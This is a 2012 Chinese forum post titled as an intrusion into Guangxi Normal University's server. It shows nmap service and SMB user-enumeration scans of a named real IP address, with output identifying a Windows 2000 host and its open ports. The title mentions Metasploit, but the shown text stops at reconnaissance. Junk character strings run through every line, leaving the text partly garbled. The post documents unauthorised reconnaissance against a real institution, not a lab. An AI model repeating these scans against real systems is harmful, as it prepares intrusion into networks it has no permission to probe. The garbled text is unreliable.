标题: nmap+msf入侵广西师范 [打印本页] 作者: admin 时间: 2012-12-4 12:46 标题: nmap+msf入侵广西师范 广西师范网站http://202.103.242.241/! F' T9 @) m3 I
/ p: y3 F2 c1 a) Xroot@bt:~# nmap -sS -sV 202.103.242.241 K" o. y5 i! O ! _: e% h8 h# N& q8 e+ P, z7 V. sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST: i/ B0 z5 ^, E# a2 g, b5 p, r
6 R# c) D2 }7 o: Y+ k' wNmap scan report for bogon (202.103.242.241) 9 t( Z$ ]# h1 c) L, M# `2 n% r 9 s, A1 d- ^9 c- E t/ V, p! ?9 {Host is up (0.00048s latency).7 ?% P& o$ T( t0 U# e
' D+ S* e5 j; B. K" ONot shown: 993 closed ports; O3 U3 X5 @/ \. p
% D% ?+ w- Z" I! z5 N4 I1 H
PORT STATE SERVICE VERSION; U$ o3 L: q% B! z* W- b
; W2 K4 H" ?6 c9 u9 O4 u7 t135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) ) C! f5 q! S3 {- V& r + |8 @3 O: P# k: B, d/ j139/tcp open netbios-ssn3 k. ?* V1 p, v7 I& X8 ^3 D
% d1 Q% ]/ U% Z" _
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds6 G) Q' y/ |/ y
% \! V) P- E, y2 l: b1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 L& w' k5 W+ c
( F* b3 u% `2 x9 J5 M1026/tcp open msrpc Microsoft Windows RPC& e& `& L0 J0 x5 ?) l
5 S# e5 M+ @9 w2 H" f1 X8 O3372/tcp open msdtc?6 p: A: {7 `2 `% K- A% m
' a x) ]# [* m7 p+ T% t
3389/tcp open ms-term-serv?& Y2 V! P* @+ M& v
* l F$ w$ z* `1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : 3 l3 V% |1 n6 y$ M; o$ C9 n! d6 cSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r F) _" f" m+ c8 ]9 H, \& |
2 A2 T$ c) d) S1 r& n# [SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions ( C: @6 S2 F% C. M * t6 {; Q, x& w0 K( ^& q* K; uSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)1 o+ C$ w9 T6 h+ e
8 ?2 v6 Y" h8 l) v6 wSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO' @6 U( ?1 v5 y$ | Z
- c' P; I/ k. y N
SF:ptions,6,”hO\n\x000Z”);6 `0 c9 J4 b6 `" Z7 M6 @. [) K* z
1 m; r" R n( u B-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse; x4 l4 M) h' H4 ^$ [6 }
4 O. G, w5 Z) [0 Y) P. m-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse) e, l" ]) B3 M7 J$ y: ]
! s% [8 n* N/ n! n$ `* M% a* T+ u
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 # Z0 k9 B8 z- z- _; Q6 ? 0 ~8 M2 B. ^! l: B3 x//此乃使用脚本扫描远程机器所存在的账户名 # {; _; g# ?* X5 }2 q# k& \' d8 W. g6 l1 G- V
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST5 P+ A$ z F* A2 W* v7 i7 Y& R1 X' Y
' e; l% M) J% n+ p6 q XNmap scan report for bogon (202.103.242.241)- e7 A# A Q5 [8 D0 U6 c
8 u( Q+ J. O; x" w- f k
Host is up (0.00038s latency).) w5 c! R5 @" u
, C c9 B% x1 P1 Z$ J
Not shown: 993 closed ports ; j; K1 r, ~# K6 f7 [, e( y7 u . A' N% W3 c8 z) h# g) s- z/ Q: c9 RPORT STATE SERVICE7 v I; J/ [/ Q: R, s' ?, Z
/ _3 M, Y& w3 ^9 D
135/tcp open msrpc 3 k# a* ^: U$ F3 r4 n; E9 d, F. H1 G/ e+ V$ T0 q+ _. S1 X
139/tcp open netbios-ssn. M0 U# Y0 @6 i2 z
! R' @5 ~* L `1 B+ c
445/tcp open microsoft-ds / @/ v. E$ F$ }9 P' P& s5 H$ l V2 R# g0 f" c4 t1025/tcp open NFS-or-IIS0 p/ @# d1 |- Q% o U9 R7 W
2 I& c! R- O- Y9 o" b% u8 M
1026/tcp open LSA-or-nterm - {! f0 Y( y& z : ~$ ]- x; x) N4 Z r* V% C, y$ n4 m c3372/tcp open msdtc5 q) Q' T; a" R% S. G5 b
/ w e2 u' h& V8 [$ g& P/ z3389/tcp open ms-term-serv3 u( x3 J: b1 l8 S3 A o' R3 `